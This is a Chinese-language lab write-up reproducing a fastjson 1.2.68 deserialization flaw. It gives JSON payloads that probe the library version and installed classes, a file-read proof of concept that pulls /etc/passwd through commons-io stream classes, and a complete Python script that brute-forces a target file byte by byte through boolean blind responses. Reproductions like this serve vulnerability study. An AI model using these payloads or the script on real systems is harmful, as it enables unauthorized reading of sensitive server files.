fastjson漏洞复现-1268-readfile

06-1268-readfile#

参考：https://github.com/lemono0/FastJsonPart

主打一个过程复现，理解漏洞利用流程，网上很多大佬的文章，文章写的很好，但作为基础学习还是不够（特别是用 idea 编译 java 文件，如何解决依赖等基础问题，-__-|.），所以就把自己复现过程的流程写下。

探测版本，删除括号报错

Pasted image 20250108160156

{
  "@type": "java.lang.AutoCloseable"

Pasted image 20250108160246

版本为 1.2.68

此版本限制了 jndi 的利用，比较常见的方式是文件读写

环境依赖探测

利用 Character 类型转换报错，当存在指定的类时会报转换错误，不存在则没有回显

探测是否是 jdk11

{
  "x": {
    "@type": "java.lang.Character"{
  "@type": "java.lang.Class",
  "val": "java.net.http.HttpClient"
		}
	}

Pasted image 20250108160715

只能说明不是 jdk11

探测 commons-io 依赖

{
"x": {
  "@type": "java.lang.Character"{
"@type": "java.lang.Class",
"val": "org.apache.commons.io.Charsets"
}}

Pasted image 20250108160900

说明存在 commons-io 依赖，但不确定版本

探测版本

{
  "x": {
    "@type": "java.lang.Character"{
  "@type": "java.lang.Class",
  "val": "org.apache.commons.io.file.Counters"
		}
	}

Pasted image 20250108161012

org.apache.commons.io.file.Counters 是在 commons-io2.7~2.8 引入的，无关键报错回显，说明不是 2.7~2.8 版本

在 commons-io2.0~2.8 下进行文件读取，poc 如下：

{
  "abc": {
    "@type": "java.lang.AutoCloseable",
    "@type": "org.apache.commons.io.input.BOMInputStream",
    "delegate": {
      "@type": "org.apache.commons.io.input.ReaderInputStream",
      "reader": {
        "@type": "jdk.nashorn.api.scripting.URLReader",
        "url": "file:///etc/passwd"
      },
      "charsetName": "UTF-8",
      "bufferSize": 1024
    },
    "boms": [
      {
        "charsetName": "UTF-8",
        "bytes": [
          114,111,111,116
        ]
      }
    ]
  },
  "address": {
    "@type": "java.lang.AutoCloseable",
    "@type": "org.apache.commons.io.input.CharSequenceReader",
    "charSequence": {
      "@type": "java.lang.String"{"$ref":"$.abc.BOM[0]"},
    "start": 0,
    "end": 0
  }
}
}

如上 poc 尝试读取 /etc/passwd，返回如下内容，说明成功读取了 /etc/passwd 的内容，114,111,111,116 即为 root。

Pasted image 20250108161304

Pasted image 20250108161444

就导致了 bool 盲注产生。那么后面就是写脚本读取敏感文件，爆破字节即可。

使用作者提供的如下脚本爆破

import requests
import json

url = "http://10.30.0.84/login"

asciis = [10,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126]
file_byte = []
data1 = """
{
    "abc": {
				"@type": "java.lang.AutoCloseable",
        "@type": "org.apache.commons.io.input.BOMInputStream",
        "delegate": {
            "@type": "org.apache.commons.io.input.ReaderInputStream",
            "reader": {
                "@type": "jdk.nashorn.api.scripting.URLReader",
                "url": "file:///flag"
            },
            "charsetName": "UTF-8",
            "bufferSize": 1024
        },
        "boms": [
            {
                "charsetName": "UTF-8",
                "bytes": [
"""  

data2 = """
                ]
            }
        ]
    },
    "address": {
        "@type": "java.lang.AutoCloseable",
        "@type": "org.apache.commons.io.input.CharSequenceReader",
        "charSequence": {
            "@type": "java.lang.String"{"$ref":"$.abc.BOM[0]"},
            "start": 0,
            "end": 0
        }
    }
}
"""
proxies = {
    'http': '127.0.0.1:8080',
}

header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0",
    "Content-Type": "application/json; charset=utf-8"
}


for i in range(1,30):  # 需要读取多长自己定义，但一次性不要太长，建议分多次读取
    for i in asciis:
        file_byte.append(str(i))
        req = requests.post(url=url,data=data1+','.join(file_byte)+data2,headers=header)
        text = req.text
        if "charSequence" not in text:
            file_byte.pop()         

print(','.join(file_byte))   
file_str = ""
for i in file_byte:
    file_str += chr(int(i))
print(file_str)